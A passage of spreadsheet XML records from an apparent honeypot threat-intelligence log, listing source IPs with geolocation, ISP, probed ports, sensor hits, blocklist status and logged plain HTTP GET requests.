    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:3dfa"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3681"/>
    <x v="3681"/>
    <s v="125-228-180-10.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:43:39"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T20:43:39"/>
    <n v="620"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_DNS_H38&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;53&amp;&amp;20505&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7de4:b40a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3682"/>
    <x v="3682"/>
    <s v="59-125-60-224.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:42:16"/>
    <d v="2024-09-11T06:18:00"/>
    <d v="2025-04-01T20:42:16"/>
    <n v="244"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;22&amp;&amp;22396&amp;&amp;31846"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Buzi"/>
    <s v="1670264"/>
    <s v="NA"/>
    <s v="24.2101"/>
    <s v="120.573"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7d:3ce0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3683"/>
    <x v="3683"/>
    <s v="NA&amp;&amp;220-135-149-27.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T20:39:46"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-01T20:39:46"/>
    <n v="245"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:951b"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3684"/>
    <x v="3684"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:39:42"/>
    <d v="2024-12-27T16:09:43"/>
    <d v="2025-04-01T20:39:42"/>
    <n v="142"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="VC"/>
    <s v="Valencia"/>
    <s v="Alicante"/>
    <s v="Cañada"/>
    <s v="2520397"/>
    <s v="03409"/>
    <s v="38.6739"/>
    <s v="-0.8133"/>
    <s v="12479"/>
    <s v="Orange Espagne SA"/>
    <s v="UNI2"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5533:ff93"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3685"/>
    <x v="3685"/>
    <s v="220-133-67-138.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:35:50"/>
    <d v="2024-09-11T10:57:00"/>
    <d v="2025-04-01T20:35:50"/>
    <n v="471"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;47476&amp;&amp;80&amp;&amp;NA&amp;&amp;60586&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc85:438a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3686"/>
    <x v="3686"/>
    <s v="220-133-40-168.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:33:34"/>
    <d v="2023-11-05T19:14:00"/>
    <d v="2025-04-01T20:33:34"/>
    <n v="5089"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;35855&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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dc85:28a8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3687"/>
    <x v="3687"/>
    <s v="NA&amp;&amp;60-248-68-185.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T20:31:22"/>
    <d v="2024-12-15T09:46:39"/>
    <d v="2025-04-01T20:31:22"/>
    <n v="265"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;44303&amp;&amp;45452&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2004-10-29"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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3cf8:44b9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3688"/>
    <x v="3688"/>
    <s v="NA&amp;&amp;220-133-82-141.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T20:28:26"/>
    <d v="2024-12-20T14:38:40"/>
    <d v="2025-04-01T20:28:26"/>
    <n v="224"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33"/>
    <s v="23&amp;&amp;9100&amp;&amp;NA&amp;&amp;58937"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc85:528d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3689"/>
    <x v="3689"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:18:34"/>
    <d v="2025-04-01T20:18:34"/>
    <d v="2025-04-01T20:18:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kuala Lumpur City Centre)"/>
    <s v="1735161"/>
    <s v="50088"/>
    <s v="3.15823"/>
    <s v="101.713"/>
    <s v="9534"/>
    <s v="MAXIS-AS1-AP"/>
    <s v="Maxis Broadband Sdn Bhd"/>
    <s v="consumer"/>
    <s v="Maxisnet Hsdpa"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7979:a351"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3690"/>
    <x v="3690"/>
    <s v="59-126-81-234.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:17:12"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T20:17:12"/>
    <n v="603"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;45641&amp;&amp;23&amp;&amp;3984&amp;&amp;57919&amp;&amp;43686&amp;&amp;9100"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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3b7e:51ea"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3691"/>
    <x v="3691"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:17:09"/>
    <d v="2025-04-01T20:17:09"/>
    <d v="2025-04-01T20:17:09"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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b:82db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3692"/>
    <x v="3692"/>
    <s v="125-229-138-168.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T20:16:02"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T20:16:02"/>
    <n v="1026"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;32155&amp;&amp;23&amp;&amp;NA&amp;&amp;10862"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
